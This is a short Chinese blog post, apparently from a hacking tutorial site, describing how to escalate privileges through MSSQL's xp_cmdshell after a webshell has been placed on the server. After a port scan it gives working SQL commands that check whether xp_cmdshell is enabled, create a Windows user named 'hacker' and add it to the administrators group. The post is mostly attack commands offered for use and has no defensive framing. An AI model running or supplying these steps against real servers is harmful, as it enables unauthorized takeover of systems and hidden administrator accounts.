mssqlserver xp_cmdshell提權

sircoding發表於2017-11-30

首先把大馬上傳上去,再webshell.asp上進行操作

進行埠掃描,發現有1433埠存在,說明有mssql資料庫

在sql操作命令處,進行輸入命令:select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell‘ 檢視xp_cmdshell是否開啟

新增系統賬號:exec master.dbo.xp_cmdshell 'net user hacker 123456 /add'

加入管理員組:exec master.dbo.xp_cmdshell 'net localgroup administrators hacker /add'


相關文章